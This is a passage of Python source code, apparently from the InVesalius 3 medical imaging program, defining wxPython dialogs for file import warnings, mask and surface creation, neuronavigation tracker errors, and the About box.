icon = wx.ArtProvider.GetBitmap(wx.ART_ERROR, wx.ART_MESSAGE_BOX, (title_height * 2, title_height * 2))
bmp = wx.StaticBitmap(self, -1, icon)
text = wx.TextCtrl(self, style=wx.TE_MULTILINE|wx.TE_READONLY|wx.BORDER_NONE)
text.SetValue(message)
text.SetBackgroundColour(wx.SystemSettings.GetColour(4))
width, height = text.GetTextExtent("M"*60)
text.SetMinSize((width, -1))
btn_ok = wx.Button(self, wx.ID_OK)
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.Realize()
title_sizer = wx.BoxSizer(wx.HORIZONTAL)
title_sizer.Add(bmp, 0, wx.ALL | wx.EXPAND, 5)
title_sizer.Add(title_label, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(title_sizer, 0, wx.ALL | wx.EXPAND, 5)
sizer.Add(text, 1, wx.ALL | wx.EXPAND, 5)
sizer.Add(btnsizer, 0, wx.EXPAND | wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
self.Center()
def SaveChangesDialog__Old(filename):
message = _("The project %s has been modified.\nSave changes?")%filename
dlg = MessageDialog(message)
answer = dlg.ShowModal()
dlg.Destroy()
if answer == wx.ID_YES:
return 1
elif answer == wx.ID_NO:
return 0
else:
return -1
def ImportEmptyDirectory(dirpath):
msg = _("%s is an empty folder.") % dirpath.decode("utf-8")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "",
msg,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg,
"InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def ImportOldFormatInvFile():
msg = _("File was created in a newer InVesalius version. Some functionalities may not work correctly.")
dlg = wx.MessageDialog(None, msg,
"InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def ImportInvalidFiles(ftype="DICOM"):
if ftype == "Bitmap":
msg = _("There are no Bitmap, JPEG, PNG or TIFF files in the selected folder.")
elif ftype == "DICOM":
msg = _("There are no DICOM files in the selected folder.")
else:
msg = _("Invalid file.")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def ImportAnalyzeWarning():
msg1 = _("Warning! InVesalius has limited support to Analyze format.\n")
msg2 = _("Slices may be wrongly oriented and functions may not work properly.")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg1 + msg2,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg1 + msg2, "InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def InexistentMask():
msg = _("A mask is needed to create a surface.")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def MaskSelectionRequiredForRemoval():
msg = _("No mask was selected for removal.")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def SurfaceSelectionRequiredForRemoval():
msg = _("No surface was selected for removal.")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def MeasureSelectionRequiredForRemoval():
msg = _("No measure was selected for removal.")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def MaskSelectionRequiredForDuplication():
msg = _("No mask was selected for duplication.")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def SurfaceSelectionRequiredForDuplication():
msg = _("No surface was selected for duplication.")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
# Dialogs for neuronavigation mode
# ----------------------------------
def ShowNavigationTrackerWarning(trck_id, lib_mode):
"""
Spatial Tracker connection error
"""
trck = {const.SELECT: 'Tracker',
const.MTC: 'Claron MicronTracker',
const.FASTRAK: 'Polhemus FASTRAK',
const.ISOTRAKII: 'Polhemus ISOTRAK',
const.PATRIOT: 'Polhemus PATRIOT',
const.CAMERA: 'CAMERA',
const.POLARIS: 'NDI Polaris',
const.POLARISP4: 'NDI Polaris P4',
const.OPTITRACK: 'Optitrack',
const.ROBOT: 'Robotic navigation',
const.DEBUGTRACKRANDOM: 'Debug tracker device (random)',
const.DEBUGTRACKAPPROACH: 'Debug tracker device (approach)'}
if lib_mode == 'choose':
msg = _('No tracking device selected')
elif lib_mode == 'error':
msg = trck[trck_id] + _(' is not installed.')
elif lib_mode == 'disconnect':
msg = trck[trck_id] + _(' disconnected.')
else:
msg = trck[trck_id] + _(' is not connected.')
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3 - Neuronavigator",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def ICPcorregistration(fre):
msg = _("The fiducial registration error is: ") + str(round(fre, 2)) + '\n\n' + \
_("Would you like to improve accuracy?")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.YES_NO)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.YES_NO)
if dlg.ShowModal() == wx.ID_YES:
flag = True
else:
flag = False
dlg.Destroy()
return flag
def ReportICPerror(prev_error, final_error):
msg = _("Error after refine: ") + str(round(final_error, 2)) + ' mm' + '\n\n' + \
_("Previous error: ") + str(round(prev_error, 2)) + ' mm'
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.OK)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.OK)
dlg.ShowModal()
dlg.Destroy()
def ShowEnterMarkerID(default):
msg = _("Edit marker ID")
if sys.platform == 'darwin':
dlg = wx.TextEntryDialog(None, "", msg, defaultValue=default)
else:
dlg = wx.TextEntryDialog(None, msg, "InVesalius 3", value=default)
dlg.ShowModal()
result = dlg.GetValue()
dlg.Destroy()
return result
def ShowConfirmationDialog(msg=_('Proceed?')):
# msg = _("Do you want to delete all markers?")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.OK | wx.CANCEL | wx.ICON_QUESTION)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
return result
def ShowColorDialog(color_current):
cdata = wx.ColourData()
cdata.SetColour(wx.Colour(color_current))
dlg = wx.ColourDialog(None, data=cdata)
dlg.GetColourData().SetChooseFull(True)
if dlg.ShowModal() == wx.ID_OK:
color_new = dlg.GetColourData().GetColour().Get(includeAlpha=False)
else:
color_new = None
dlg.Destroy()
return color_new
# ----------------------------------
class NewMask(wx.Dialog):
def __init__(self,
parent=None,
ID=-1,
title="InVesalius 3",
size=wx.DefaultSize,
pos=wx.DefaultPosition,
style=wx.DEFAULT_DIALOG_STYLE,
useMetal=False):
import invesalius.constants as const
import invesalius.data.mask as mask
import invesalius.project as prj
wx.Dialog.__init__(self, parent, ID, title, pos, style=style)
self.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)
self.CenterOnScreen()
# This extra style can be set after the UI object has been created.
if 'wxMac' in wx.PlatformInfo and useMetal:
self.SetExtraStyle(wx.DIALOG_EX_METAL)
self.CenterOnScreen()
# LINE 1: Surface name
label_mask = wx.StaticText(self, -1, _("New mask name:"))
default_name = const.MASK_NAME_PATTERN %(mask.Mask.general_index+2)
text = wx.TextCtrl(self, -1, "", size=(80,-1))
text.SetHelpText(_("Name the mask to be created"))
text.SetValue(default_name)
self.text = text
# LINE 2: Threshold of reference
# Informative label
label_thresh = wx.StaticText(self, -1, _("Threshold preset:"))
# Retrieve existing masks
project = prj.Project()
thresh_list = sorted(project.threshold_modes.keys())
default_index = thresh_list.index(_("Bone"))
self.thresh_list = thresh_list
# Mask selection combo
combo_thresh = wx.ComboBox(self, -1, "", choices= self.thresh_list,
style=wx.CB_DROPDOWN|wx.CB_READONLY)
combo_thresh.SetSelection(default_index)
if sys.platform != 'win32':
combo_thresh.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
self.combo_thresh = combo_thresh
# LINE 3: Gradient
bound_min, bound_max = project.threshold_range
thresh_min, thresh_max = project.threshold_modes[_("Bone")]
original_colour = random.choice(const.MASK_COLOUR)
self.colour = original_colour
colour = [255*i for i in original_colour]
colour.append(100)
gradient = grad.GradientCtrl(self, -1, int(bound_min),
int(bound_max),
int(thresh_min), int(thresh_max),
colour)
self.gradient = gradient
# OVERVIEW
# Sizer that joins content above
flag_link = wx.EXPAND|wx.GROW|wx.ALL
flag_button = wx.ALL | wx.EXPAND| wx.GROW
fixed_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=10, vgap=10)
fixed_sizer.AddGrowableCol(0, 1)
fixed_sizer.AddMany([ (label_mask, 1, flag_link, 5),
(text, 1, flag_button, 2),
(label_thresh, 1, flag_link, 5),
(combo_thresh, 0, flag_button, 1)])#,
#(label_quality, 1, flag_link, 5),
#(combo_quality, 0, flag_button, 1)])
# LINE 6: Buttons
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
# OVERVIEW
# Merge all sizers and checkboxes
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(fixed_sizer, 0, wx.ALL|wx.GROW|wx.EXPAND, 15)
sizer.Add(gradient, 0, wx.BOTTOM|wx.RIGHT|wx.LEFT|wx.EXPAND|wx.GROW, 20)
sizer.Add(btnsizer, 0, wx.ALIGN_RIGHT|wx.BOTTOM, 10)
self.SetSizer(sizer)
sizer.Fit(self)
self.Layout()
self.Bind(grad.EVT_THRESHOLD_CHANGED, self.OnSlideChanged, self.gradient)
self.combo_thresh.Bind(wx.EVT_COMBOBOX, self.OnComboThresh)
def OnComboThresh(self, evt):
import invesalius.project as prj
proj = prj.Project()
(thresh_min, thresh_max) = proj.threshold_modes[evt.GetString()]
self.gradient.SetMinimun(thresh_min)
self.gradient.SetMaximun(thresh_max)
def OnSlideChanged(self, evt):
import invesalius.project as prj
thresh_min = self.gradient.GetMinValue()
thresh_max = self.gradient.GetMaxValue()
thresh = (thresh_min, thresh_max)
proj = prj.Project()
if thresh in proj.threshold_modes.values():
preset_name = proj.threshold_modes.get_key(thresh)[0]
index = self.thresh_list.index(preset_name)
self.combo_thresh.SetSelection(index)
else:
index = self.thresh_list.index(_("Custom"))
self.combo_thresh.SetSelection(index)
def GetValue(self):
#mask_index = self.combo_mask.GetSelection()
mask_name = self.text.GetValue()
thresh_value = [self.gradient.GetMinValue(), self.gradient.GetMaxValue()]
#quality = const.SURFACE_QUALITY_LIST[self.combo_quality.GetSelection()]
#fill_holes = self.check_box_holes.GetValue()
#keep_largest = self.check_box_largest.GetValue()
#return (mask_index, surface_name, quality, fill_holes, keep_largest)
return mask_name, thresh_value, self.colour
def InexistentPath(path):
msg = _("%s does not exist.")%(path)
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def MissingFilesForReconstruction():
msg = _("Please, provide more than one DICOM file for 3D reconstruction")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_INFORMATION | wx.OK)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.ICON_INFORMATION | wx.OK)
dlg.ShowModal()
dlg.Destroy()
def SaveChangesDialog(filename, parent):
current_dir = os.path.abspath(".")
msg = _(u"The project %s has been modified.\nSave changes?")%filename
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_QUESTION | wx.YES_NO | wx.CANCEL)
else:
dlg = wx.MessageDialog(None, msg, "InVesalius 3",
wx.ICON_QUESTION | wx.YES_NO | wx.CANCEL)
try:
answer = dlg.ShowModal()
except(wx._core.PyAssertionError): #TODO: FIX win64
answer = wx.ID_YES
dlg.Destroy()
os.chdir(current_dir)
if answer == wx.ID_YES:
return 1
elif answer == wx.ID_NO:
return 0
else:
return -1
def SaveChangesDialog2(filename):
current_dir = os.path.abspath(".")
msg = _("The project %s has been modified.\nSave changes?")%filename
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_QUESTION | wx.YES_NO)
else:
dlg = wx.MessageDialog(None, msg,
"InVesalius 3",
wx.ICON_QUESTION | wx.YES_NO)
answer = dlg.ShowModal()
dlg.Destroy()
os.chdir(current_dir)
if answer == wx.ID_YES:
return 1
else:# answer == wx.ID_NO:
return 0
def ShowAboutDialog(parent):
info = AboutDialogInfo()
info.Name = "InVesalius"
info.Version = const.INVESALIUS_VERSION
info.Copyright = _("(c) 2007-2022 Center for Information Technology Renato Archer - CTI")
info.Description = wordwrap(_("InVesalius is a medical imaging program for 3D reconstruction. It uses a sequence of 2D DICOM image files acquired with CT or MRI scanners. InVesalius allows exporting 3D volumes or surfaces as mesh files for creating physical models of a patient's anatomy using additive manufacturing (3D printing) technologies. The software is developed by Center for Information Technology Renato Archer (CTI), National Council for Scientific and Technological Development (CNPq) and the Brazilian Ministry of Health.\n\n InVesalius must be used only for research. The Center for Information Technology Renato Archer is not responsible for damages caused by the use of this software.\n\n Contact: invesalius@cti.gov.br"), 350, wx.ClientDC(parent))
# _("InVesalius is a software for medical imaging 3D reconstruction. ")+\
# _("Its input is a sequency of DICOM 2D image files acquired with CT or MR.\n\n")+\
# _("The software also allows generating correspondent STL files,")+\
# _("so the user can print 3D physical models of the patient's anatomy ")+\
# _("using Rapid Prototyping."), 350, wx.ClientDC(parent))
icon = wx.Icon(os.path.join(inv_paths.ICON_DIR, "invesalius_64x64.ico"),\
wx.BITMAP_TYPE_ICO)
info.SetWebSite("https://www.cti.gov.br/invesalius")
info.SetIcon(icon)
info.License = _("GNU GPL (General Public License) version 2")
info.Developers = [u"Paulo Henrique Junqueira Amorim",
u"Thiago Franco de Moraes",
u"Hélio Pedrini",
u"Jorge Vicente Lopes da Silva",
u"Victor Hugo de Oliveira e Souza (navigator)",
u"Renan Hiroshi Matsuda (navigator)",
u"André Salles Cunha Peres (navigator)",
u"Oswaldo Baffa Filho (navigator)",
u"Tatiana Al-Chueyr (former)",
u"Guilherme Cesar Soares Ruppert (former)",
u"Fabio de Souza Azevedo (former)",
u"Bruno Lara Bottazzini (contributor)",
u"Olly Betts (patches to support wxPython3)"]
info.Translators = [u"Alex P. Natsios",
u"Alicia Perez",
u"Anderson Antonio Mamede da Silva",
u"Andreas Loupasakis",
u"Angelo Pucillo",
u"Annalisa Manenti",
u"Cheng-Chia Tseng",
u"Dan",
u"DCamer",
u"Dimitris Glezos",
u"Eugene Liscio",
u"Frédéric Lopez",
u"Florin Putura",
u"Fri",
u"Jangblue",
u"Javier de Lima Moreno",
u"Kensey Okinawa",
u"Maki Sugimoto",
u"Mario Regino Moreno Guerra",
u"Massimo Crisantemo",
u"Nikolai Guschinsky",
u"Nikos Korkakakis",
u"Raul Bolliger Neto",
u"Sebastian Hilbert",
u"Semarang Pari",
u"Silvério Santos",
u"Vasily Shishkin",
u"Yohei Sotsuka",
u"Yoshihiro Sato"]
#info.DocWriters = ["Fabio Francisco da Silva (PT)"]
info.Artists = [u"Otavio Henrique Junqueira Amorim"]
# Then we call AboutBox providing its info object
AboutBox(info)
def ShowSavePresetDialog(default_filename="raycasting"):
dlg = wx.TextEntryDialog(None,
_("Save raycasting preset as:"),
"InVesalius 3")
#dlg.SetFilterIndex(0) # default is VTI
filename = None
try:
if dlg.ShowModal() == wx.ID_OK:
filename = dlg.GetValue()
except(wx._core.PyAssertionError):
filename = dlg.GetValue()
return filename
class NewSurfaceDialog(wx.Dialog):
def __init__(self, parent=None, ID=-1, title="InVesalius 3", size=wx.DefaultSize,
pos=wx.DefaultPosition, style=wx.DEFAULT_DIALOG_STYLE,
useMetal=False):
import invesalius.constants as const
import invesalius.data.surface as surface
import invesalius.project as prj
wx.Dialog.__init__(self, parent, ID, title, pos, (500,300), style)
self.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)
self.CenterOnScreen()
# This extra style can be set after the UI object has been created.
if 'wxMac' in wx.PlatformInfo and useMetal:
self.SetExtraStyle(wx.DIALOG_EX_METAL)
self.CenterOnScreen()
# LINE 1: Surface name
label_surface = wx.StaticText(self, -1, _("New surface name:"))
default_name = const.SURFACE_NAME_PATTERN %(surface.Surface.general_index+2)
text = wx.TextCtrl(self, -1, "", size=(80,-1))
text.SetHelpText(_("Name the surface to be created"))
text.SetValue(default_name)
self.text = text
# LINE 2: Mask of reference
# Informative label
label_mask = wx.StaticText(self, -1, _("Mask of reference:"))
# Retrieve existing masks
project = prj.Project()
index_list = sorted(project.mask_dict.keys())
self.mask_list = [project.mask_dict[index].name for index in index_list]
# Mask selection combo
combo_mask = wx.ComboBox(self, -1, "", choices= self.mask_list,
style=wx.CB_DROPDOWN|wx.CB_READONLY)
combo_mask.SetSelection(len(self.mask_list)-1)
if sys.platform != 'win32':
combo_mask.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
self.combo_mask = combo_mask
# LINE 3: Surface quality
label_quality = wx.StaticText(self, -1, _("Surface quality:"))
choices = const.SURFACE_QUALITY_LIST
style = wx.CB_DROPDOWN|wx.CB_READONLY
combo_quality = wx.ComboBox(self, -1, "",
choices= choices,
style=style)
combo_quality.SetSelection(3)
if sys.platform != 'win32':
combo_quality.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
self.combo_quality = combo_quality
# OVERVIEW
# Sizer that joins content above
flag_link = wx.EXPAND|wx.GROW|wx.ALL
flag_button = wx.ALL | wx.EXPAND| wx.GROW
fixed_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=10, vgap=0)
fixed_sizer.AddGrowableCol(0, 1)
fixed_sizer.AddMany([ (label_surface, 1, flag_link, 5),
(text, 1, flag_button, 2),
(label_mask, 1, flag_link, 5),
(combo_mask, 0, flag_button, 1),
(label_quality, 1, flag_link, 5),
(combo_quality, 0, flag_button, 1)])
# LINES 4 and 5: Checkboxes
check_box_holes = wx.CheckBox(self, -1, _("Fill holes"))
check_box_holes.SetValue(True)
self.check_box_holes = check_box_holes
check_box_largest = wx.CheckBox(self, -1, _("Keep largest region"))
self.check_box_largest = check_box_largest
# LINE 6: Buttons
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
# OVERVIEW
# Merge all sizers and checkboxes
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(fixed_sizer, 0, wx.TOP|wx.RIGHT|wx.LEFT|wx.GROW|wx.EXPAND, 20)
sizer.Add(check_box_holes, 0, wx.RIGHT|wx.LEFT, 30)
sizer.Add(check_box_largest, 0, wx.RIGHT|wx.LEFT, 30)
sizer.Add(btnsizer, 0, wx.ALIGN_RIGHT|wx.ALL, 10)
self.SetSizer(sizer)
sizer.Fit(self)
def GetValue(self):
mask_index = self.combo_mask.GetSelection()
surface_name = self.text.GetValue()
quality = const.SURFACE_QUALITY_LIST[self.combo_quality.GetSelection()]
fill_holes = self.check_box_holes.GetValue()
keep_largest = self.check_box_largest.GetValue()
return (mask_index, surface_name, quality, fill_holes, keep_largest)
def ExportPicture(type_=""):
import invesalius.constants as const
import invesalius.project as proj
INDEX_TO_EXTENSION = {0: "bmp", 1: "jpg", 2: "png", 3: "ps", 4:"povray", 5:"tiff"}
WILDCARD_SAVE_PICTURE = _("BMP image")+" (*.bmp)|*.bmp|"+\
_("JPG image")+" (*.jpg)|*.jpg|"+\
_("PNG image")+" (*.png)|*.png|"+\
_("PostScript document")+" (*.ps)|*.ps|"+\
_("POV-Ray file")+" (*.pov)|*.pov|"+\
_("TIFF image")+" (*.tif)|*.tif"
INDEX_TO_TYPE = {0: const.FILETYPE_BMP,
1: const.FILETYPE_JPG,
2: const.FILETYPE_PNG,
3: const.FILETYPE_PS,
4: const.FILETYPE_POV,
5: const.FILETYPE_TIF}
utils.debug("ExportPicture")
project = proj.Project()
session = ses.Session()
last_directory = session.get('paths', 'last_directory_screenshot', '')
project_name = "%s_%s" % (project.name, type_)
if not sys.platform in ('win32', 'linux2', 'linux'):
project_name += ".jpg"
dlg = wx.FileDialog(None,
"Save %s picture as..." %type_,
last_directory, # last used directory
project_name, # filename
WILDCARD_SAVE_PICTURE,
wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT)
dlg.SetFilterIndex(1) # default is VTI
if dlg.ShowModal() == wx.ID_OK:
filetype_index = dlg.GetFilterIndex()
filetype = INDEX_TO_TYPE[filetype_index]
extension = INDEX_TO_EXTENSION[filetype_index]
filename = dlg.GetPath()
session['paths']['last_directory_screenshot'] = os.path.split(filename)[0]
session.WriteSessionFile()
if sys.platform != 'win32':
if filename.split(".")[-1] != extension:
filename = filename + "."+ extension
return filename, filetype
else:
return ()
class SurfaceDialog(wx.Dialog):
'''
This dialog is only shown when the mask whose surface will be generate was
edited. So far, the only options available are the choice of method to
generate the surface, Binary or `Context aware smoothing', and options from
`Context aware smoothing'
'''
def __init__(self):
wx.Dialog.__init__(self, None, -1, _('Surface generation options'))
self._build_widgets()
self.CenterOnScreen()
def _build_widgets(self):
btn_ok = wx.Button(self, wx.ID_OK)
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_sizer = wx.StdDialogButtonSizer()
btn_sizer.AddButton(btn_ok)
btn_sizer.AddButton(btn_cancel)
btn_sizer.Realize()
self.ca = SurfaceMethodPanel(self, -1, True)
self.main_sizer = wx.BoxSizer(wx.VERTICAL)
self.main_sizer.Add(self.ca, 0, wx.EXPAND|wx.ALL, 5)
self.main_sizer.Add(btn_sizer, 0, wx.EXPAND | wx.ALL, 5)
self.SetSizer(self.main_sizer)
self.Fit()
def GetOptions(self):
return self.ca.GetOptions()
def GetAlgorithmSelected(self):
return self.ca.GetAlgorithmSelected()
####################### New surface creation dialog ###########################
class SurfaceCreationDialog(wx.Dialog):
def __init__(self, parent=None, ID=-1, title=_(u"Surface creation"),
size=wx.DefaultSize, pos=wx.DefaultPosition,
style=wx.DEFAULT_DIALOG_STYLE, useMetal=False,
mask_edited=False):
wx.Dialog.__init__(self, parent, ID, title, pos, size, style)
self.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)
if 'wxMac' in wx.PlatformInfo and useMetal:
self.SetExtraStyle(wx.DIALOG_EX_METAL)
self.CenterOnScreen()
# It's necessary to create a staticbox before is children widgets
# because otherwise in MacOSX it'll not be possible to use the mouse in
# static's children widgets.
sb_nsd = wx.StaticBox(self, -1, _('Surface creation options'))
self.nsd = SurfaceCreationOptionsPanel(self, -1)
self.nsd.Bind(EVT_MASK_SET, self.OnSetMask)
surface_options_sizer = wx.StaticBoxSizer(sb_nsd, wx.VERTICAL)
surface_options_sizer.Add(self.nsd, 1, wx.EXPAND|wx.ALL, 5)
sb_ca = wx.StaticBox(self, -1, _('Surface creation method'))
self.ca = SurfaceMethodPanel(self, -1, mask_edited)
surface_method_sizer = wx.StaticBoxSizer(sb_ca, wx.VERTICAL)
surface_method_sizer.Add(self.ca, 1, wx.EXPAND|wx.ALL, 5)
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
sizer_panels = wx.BoxSizer(wx.HORIZONTAL)
sizer_panels.Add(surface_options_sizer, 0, wx.EXPAND|wx.ALL, 5)
sizer_panels.Add(surface_method_sizer, 0, wx.EXPAND|wx.ALL, 5)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(sizer_panels, 0, wx.ALIGN_RIGHT|wx.ALL, 5)
sizer.Add(btnsizer, 0, wx.ALIGN_RIGHT|wx.ALL, 5)
self.SetSizer(sizer)
sizer.Fit(self)
def OnSetMask(self, evt):
import invesalius.project as proj
mask = proj.Project().mask_dict[evt.mask_index]
self.ca.mask_edited = mask.was_edited
self.ca.ReloadMethodsOptions()
def GetValue(self):
return {"method": self.ca.GetValue(),
"options": self.nsd.GetValue()}
class SurfaceCreationOptionsPanel(wx.Panel):
def __init__(self, parent, ID=-1):
import invesalius.constants as const
import invesalius.data.surface as surface
import invesalius.project as prj
import invesalius.data.slice_ as slc
wx.Panel.__init__(self, parent, ID)
# LINE 1: Surface name
label_surface = wx.StaticText(self, -1, _("New surface name:"))
default_name = const.SURFACE_NAME_PATTERN %(surface.Surface.general_index+2)
text = wx.TextCtrl(self, -1, "", size=(80,-1))
text.SetHelpText(_("Name the surface to be created"))
text.SetValue(default_name)
self.text = text
# LINE 2: Mask of reference
# Informative label
label_mask = wx.StaticText(self, -1, _("Mask of reference:"))
#Retrieve existing masks
project = prj.Project()
index_list = project.mask_dict.keys()
self.mask_list = [project.mask_dict[index].name for index in sorted(index_list)]
active_mask = 0
for idx in project.mask_dict:
if project.mask_dict[idx] is slc.Slice().current_mask:
active_mask = idx
break
# Mask selection combo
combo_mask = wx.ComboBox(self, -1, "", choices= self.mask_list,
style=wx.CB_DROPDOWN|wx.CB_READONLY)
combo_mask.SetSelection(active_mask)
combo_mask.Bind(wx.EVT_COMBOBOX, self.OnSetMask)
if sys.platform != 'win32':
combo_mask.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
self.combo_mask = combo_mask
# LINE 3: Surface quality
label_quality = wx.StaticText(self, -1, _("Surface quality:"))
choices = const.SURFACE_QUALITY_LIST
style = wx.CB_DROPDOWN|wx.CB_READONLY
combo_quality = wx.ComboBox(self, -1, "",
choices= choices,
style=style)
combo_quality.SetSelection(3)
if sys.platform != 'win32':
combo_quality.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
self.combo_quality = combo_quality
# OVERVIEW
# Sizer that joins content above
flag_link = wx.EXPAND|wx.GROW|wx.ALL
flag_button = wx.ALL | wx.EXPAND| wx.GROW
fixed_sizer = wx.FlexGridSizer(rows=3, cols=2, hgap=10, vgap=5)
fixed_sizer.AddGrowableCol(0, 1)
fixed_sizer.AddMany([ (label_surface, 1, flag_link, 0),
(text, 1, flag_button, 0),
(label_mask, 1, flag_link, 0),
(combo_mask, 0, flag_button, 0),
(label_quality, 1, flag_link, 0),
(combo_quality, 0, flag_button, 0)])
# LINES 4, 5 and 6: Checkboxes
check_box_border_holes = wx.CheckBox(self, -1, _("Fill border holes"))
check_box_border_holes.SetValue(False)
self.check_box_border_holes = check_box_border_holes
check_box_holes = wx.CheckBox(self, -1, _("Fill holes"))
check_box_holes.SetValue(False)
self.check_box_holes = check_box_holes
check_box_largest = wx.CheckBox(self, -1, _("Keep largest region"))
self.check_box_largest = check_box_largest
# OVERVIEW
# Merge all sizers and checkboxes
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(fixed_sizer, 0, wx.TOP|wx.RIGHT|wx.LEFT|wx.GROW|wx.EXPAND, 5)
sizer.Add(check_box_border_holes, 0, wx.RIGHT|wx.LEFT, 5)
sizer.Add(check_box_holes, 0, wx.RIGHT|wx.LEFT, 5)
sizer.Add(check_box_largest, 0, wx.RIGHT|wx.LEFT, 5)
self.SetSizer(sizer)
sizer.Fit(self)
def OnSetMask(self, evt):
new_evt = MaskEvent(myEVT_MASK_SET, -1, self.combo_mask.GetSelection())
self.GetEventHandler().ProcessEvent(new_evt)
def GetValue(self):
mask_index = self.combo_mask.GetSelection()
surface_name = self.text.GetValue()
quality = const.SURFACE_QUALITY_LIST[self.combo_quality.GetSelection()]
fill_border_holes = self.check_box_border_holes.GetValue()
fill_holes = self.check_box_holes.GetValue()
keep_largest = self.check_box_largest.GetValue()
return {"index": mask_index,
"name": surface_name,
"quality": quality,
"fill_border_holes": fill_border_holes,
"fill": fill_holes,
"keep_largest": keep_largest,
"overwrite": False}
class CAOptions(wx.Panel):
'''
Options related to Context aware algorithm:
Angle: The min angle to a vertex to be considered a staircase vertex;
Max distance: The max distance a normal vertex must be to calculate its
weighting;
Min Weighting: The min weight a vertex must have;
Steps: The number of iterations the smoothing algorithm have to do.
'''
def __init__(self, parent):
